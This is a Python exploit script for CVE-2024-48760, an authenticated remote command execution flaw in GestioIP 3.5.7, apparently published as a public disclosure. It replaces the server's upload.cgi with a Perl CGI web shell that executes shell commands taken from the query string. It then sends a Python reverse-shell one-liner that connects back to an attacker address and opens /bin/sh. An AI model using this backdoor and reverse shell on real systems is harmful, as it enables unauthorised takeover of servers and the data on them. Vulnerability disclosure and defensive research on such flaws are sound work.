# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760

import requests
import sys

# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"

# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w

use strict;

print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";

my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;

print "<html><body>";
print '<!-- CGI backdoor -->';

if (!$req) {
    print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
    print "Executing: $req";
}

print "<pre>";
my @cmd = `$req`;
print "</pre>";

foreach my $line (@cmd) {
    print $line . "<br/>";
}

print "</body></html>";
"""

# Exploit functions
def upload_file(session, file_name, file_data):
    """Uploads the file to the server"""
    files = {
        'file_name': (None, file_name),
        'leases_file': (file_name, file_data)
    }
    response = session.post(target_url, files=files)
    if "OK" not in response.text:
        print(f"[!] Error uploading {file_name}.")
        sys.exit(1)
    return response

def run_command(session, cmd):
    """Execute a command in the server through the vuln"""
    url = target_url + '?' + cmd
    resp = session.get(url)
    print(resp.text)

def backdoor_exists(session):
    """Verifies if backdoor is already uploaded or not"""
    response = session.get(target_url + "?whoami")
    if "www-data" in response.text:
        return True  # backdoor already uploaded
    return False  # backdoor not uploaded yet

if __name__ == '__main__':
    with requests.Session() as session:
        session.auth = (username, password)

        # Verify if backdoor is already uploaded
        if not backdoor_exists(session):
            print("\n[!] Uploading backdoor...\n")
            upload_file(session, 'upload.cgi', backdoor_code)
        else:
            print("\n[+] Backdoor already uploaded. Continue...\n")

        # Execute the reverse shell
        print("\n[!] Executing reverse shell...\n")
        reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
        run_command(session, reverse_shell_cmd)